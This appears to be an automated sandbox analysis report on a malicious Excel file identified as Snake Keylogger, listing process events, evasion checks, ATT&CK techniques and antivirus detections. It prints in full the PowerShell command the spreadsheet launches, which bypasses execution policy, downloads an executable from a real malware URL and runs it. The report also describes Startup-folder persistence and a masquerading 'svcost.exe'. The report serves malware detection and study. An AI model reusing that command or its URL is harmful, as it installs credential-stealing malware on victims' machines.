              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: tmp667.exe, 00000005.00000002.446711663.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeMemory allocated: 1C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeMemory allocated: 2690000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeMemory allocated: 5F0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeMemory allocated: 5450000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeMemory allocated: 15450000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeMemory allocated: 310000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeMemory allocated: 2310000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeMemory allocated: 940000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4761Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2327Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3748Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3752Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3772Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exe TID: 3828Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exe TID: 3832Thread sleep count: 218 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exe TID: 3840Thread sleep count: 173 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exe TID: 4016Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exe TID: 4024Thread sleep count: 198 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exe TID: 4032Thread sleep count: 100 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
              Source: svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
              Source: svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_001CECA8 LdrInitializeThunk,5_2_001CECA8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Bypasses PowerShell execution policy
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp667.exe "C:\Users\user\AppData\Local\Temp\tmp667.exe" Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\svcost.exe "C:\Users\user\AppData\Roaming\svcost.exe" Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp667.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeQueries volume information: C:\Users\user\AppData\Roaming\svcost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Snake Keylogger
              Source: Yara matchFile source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTR
              Source: Yara matchFile source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Snake Keylogger
              Source: Yara matchFile source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information331
              Scripting              		Valid Accounts13
              Exploitation for Client Execution              		331
              Scripting              		1
              DLL Side-Loading              		1
              Disable or Modify Tools              		OS Credential Dumping2
              File and Directory Discovery              		Remote Services11
              Archive Collected Data              		2
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		11
              Process Injection              		1
              Deobfuscate/Decode Files or Information              		LSASS Memory13
              System Information Discovery              		Remote Desktop ProtocolData from Removable Media11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Scheduled Task/Job              		1
              Scheduled Task/Job              		1
              Scheduled Task/Job              		3
              Obfuscated Files or Information              		Security Account Manager21
              Security Software Discovery              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell              		2
              Registry Run Keys / Startup Folder              		2
              Registry Run Keys / Startup Folder              		1
              Install Root Certificate              		NTDS1
              Process Discovery              		Distributed Component Object ModelInput Capture13
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing              		LSA Secrets31
              Virtualization/Sandbox Evasion              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials1
              Application Window Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Masquerading              		DCSync1
              Remote System Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Modify Registry              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
              Virtualization/Sandbox Evasion              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
              Process Injection              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1562377 Sample: DGTCkacbSz.xlsx Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 34 Found malware configuration 2->34 36 Malicious sample detected (through community Yara rule) 2->36 38 Antivirus detection for URL or domain 2->38 40 15 other signatures 2->40 7 EXCEL.EXE 30 14 2->7         started        11 wscript.exe 1 2->11         started        process3 file4 28 C:\Users\user\Desktop\~$DGTCkacbSz.xlsx, data 7->28 dropped 50 Suspicious powershell command line found 7->50 13 powershell.exe 12 7 7->13         started        52 Windows Scripting host queries suspicious COM object (likely to drop second stage) 11->52 18 svcost.exe 2 11->18         started        signatures5 process6 dnsIp7 32 cia.tf 172.67.129.178, 443, 49161 CLOUDFLARENETUS United States 13->32 30 C:\Users\user\AppData\Local\Temp\tmp667.exe, PE32 13->30 dropped 54 Installs new ROOT certificates 13->54 56 Powershell drops PE file 13->56 20 tmp667.exe 4 13->20         started        58 Antivirus detection for dropped file 18->58 60 Machine Learning detection for dropped file 18->60 file8 signatures9 process10 file11 24 C:\Users\user\AppData\Roaming\svcost.exe, PE32 20->24 dropped 26 C:\Users\user\AppData\Roaming\...\svcost.vbs, ASCII 20->26 dropped 42 Multi AV Scanner detection for dropped file 20->42 44 Machine Learning detection for dropped file 20->44 46 Drops VBS files to the startup folder 20->46 48 2 other signatures 20->48 signatures12

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              DGTCkacbSz.xlsx39%ReversingLabsScript-Macro.Trojan.Snakekeylogger
              DGTCkacbSz.xlsx100%AviraVBA/Dldr.Agent.MR
              DGTCkacbSz.xlsx100%AviraHEUR/Macro.Downloader.ARIM.Gen
              DGTCkacbSz.xlsx100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\svcost.exe100%AviraHEUR/AGEN.1310409
              C:\Users\user\AppData\Roaming\svcost.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\tmp667.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\tmp667.exe68%ReversingLabsByteCode-MSIL.Trojan.RedLineStealer

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;:0%Avira URL Cloudsafe
              https://cia.tf/2ed7362e959d42385d4e6d231a6840ddB.0%Avira URL Cloudsafe
              https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe100%Avira URL Cloudmalware
